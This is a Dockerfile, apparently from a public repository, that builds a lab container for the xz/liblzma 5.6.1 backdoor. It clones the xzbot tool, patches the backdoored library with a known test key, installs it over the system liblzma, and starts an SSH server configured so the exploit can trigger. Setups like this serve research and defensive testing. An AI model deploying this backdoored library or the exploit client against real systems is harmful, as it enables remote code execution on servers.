-
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Dockerfile
89 lines (70 loc) · 2.26 KB
/
Dockerfile
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
# Images for each stage.
ARG BUILD_IMAGE=alpine:3.19.1
ARG PATCH_IMAGE=python:3.12.2-slim-bookworm
ARG CLIENT_IMAGE=golang:1.22.1-alpine3.19
ARG FINAL_IMAGE=debian:12.5-slim
# Since xz backdoor only works on x86_64. We hardcoded both OS and ARCH here.
ARG PLATFORM_OS=linux
ARG PLATFORM_ARCH=amd64
ARG PLATFORM=$PLATFORM_OS/$PLATFORM_ARCH
ARG PLATFORM_CPU_ARCH=x86_64
# xz/liblzma version
ARG XZ_VERSION=5.6.1
ARG XZ_SO=liblzma.so
ARG XZ_LIB=$XZ_SO.$XZ_VERSION
ARG XZ_DEB=liblzma5_${XZ_VERSION}_${PLATFORM_ARCH}.deb
ARG XZ_BOT_REV=0cabe4c
#
# BUILD: Clone xzbot repo.
#
FROM $BUILD_IMAGE as build
WORKDIR /build
RUN apk add --no-cache git \
&& git clone https://github.com/amlweems/xzbot.git . \
&& git checkout $XZ_BOT_REV
#
# BUILD-PATCH: Patch liblzma with ED448 public key (seed 0).
#
FROM $PATCH_IMAGE as build-patch
ARG PLATFORM_OS
ARG XZ_LIB
WORKDIR /build
COPY --from=build /build/patch.py /build/assets/$XZ_LIB .
RUN ARCH=$(uname -m | tr '_' '-'); \
apt-get update && apt-get install -y --no-install-recommends --no-install-suggests \
binutils-$ARCH-$PLATFORM_OS-gnu \
cpp \
&& pip install pwntools \
&& python3 patch.py $XZ_LIB
#
# BUILD-CLIENT: Build xzbot (ssh client).
#
FROM $CLIENT_IMAGE as build-ssh-client
ARG PLATFORM_OS
ARG PLATFORM_ARCH
WORKDIR /build
COPY --from=build /build/go.* /build/main.go .
RUN CGO_ENABLED=0 GOOS=${PLATFORM_OS} GOARCH=${PLATFORM_ARCH} go build
#
# FINAL: Build final image containing patched liblzma and xzbot.
#
FROM $FINAL_IMAGE as final
ARG XZ_LIB
ARG XZ_DEB
ARG PLATFORM_CPU_ARCH
ARG PLATFORM_OS
# ENV DEBIAN_FRONTEND=noninteractive
WORKDIR /build
COPY debs/$XZ_DEB .
COPY --from=build-patch /build/$XZ_LIB.patch .
COPY --from=build-ssh-client /build/xzbot .
RUN apt-get update && apt-get install -y --no-install-recommends --no-install-suggests \
openssh-server \
&& rm -rf /var/lib/apt/lists/*
# Install vulnerable version of liblzma and override it with patched version
RUN dpkg -i ./$XZ_DEB \
&& cp $XZ_LIB.patch /lib/$PLATFORM_CPU_ARCH-$PLATFORM_OS-gnu/$XZ_LIB \
&& sed -i 's/#Port 22/Port 2222/' /etc/ssh/sshd_config \
&& mkdir -p /var/run/sshd
# The trick to the exploit works without "systemd" is to unset all envs except "LANG"
CMD ["env", "-i", "LANG=en_US.UTF-8", "/usr/sbin/sshd", "-D"]